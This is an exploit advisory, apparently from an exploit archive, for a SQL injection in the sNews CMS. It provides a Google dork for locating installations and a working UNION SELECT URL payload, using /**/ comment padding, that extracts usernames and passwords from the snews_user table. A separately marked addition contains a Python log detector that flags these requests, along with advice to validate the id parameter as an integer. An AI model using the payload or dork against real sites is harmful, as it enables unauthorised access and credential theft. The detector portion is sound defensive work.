Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
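
A defensive counterpart to the request above, added here as an example (not part of the original advisory or of the sNews code): a log check that flags `shownews` requests whose `id` is not a plain integer, after undoing the `/**/` comment-as-space trick. It assumes Apache-style access-log lines and that legitimate `id` values are digits only; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ standing in for a space
OPEN_COMMENT = re.compile(r"/\*.*\Z", re.S)      # trailing /* that cuts off the query
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
SQL_FUNC = re.compile(r"\b(?:concat|char)\s*\(")

def decode(value):
    """Undo percent-encoding, up to three layers deep."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def collapse(value):
    """Turn SQL comments into spaces, squeeze whitespace, lowercase."""
    value = OPEN_COMMENT.sub(" ", INLINE_COMMENT.sub(" ", value))
    return re.sub(r"\s+", " ", value).strip().lower()

def inspect_line(line):
    """Return a sorted list of findings for one access-log line ([] means clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    params = parse_qs(target.query, keep_blank_values=True)
    if not target.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return []
    findings = set()
    for raw in params.get("id", []):
        decoded = decode(raw)
        if "/*" in decoded:
            findings.add("sql_comment")
        value = collapse(decoded)
        if not re.fullmatch(r"\d+", value):  # assumption: ids are plain integers
            findings.add("non_numeric_id")
        if UNION_SELECT.search(value):
            findings.add("union_select")
        if SQL_FUNC.search(value):
            findings.add("sql_function")
    return sorted(findings)

# Constructed sample log lines; the second carries the request shown in this advisory.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 734',
    '127.0.0.1 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=23abc HTTP/1.1" 200 512',
]
```

The same integer-only rule, enforced in the application before `id` reaches the query, is what removes the injection point; the log check only surfaces attempts.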

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*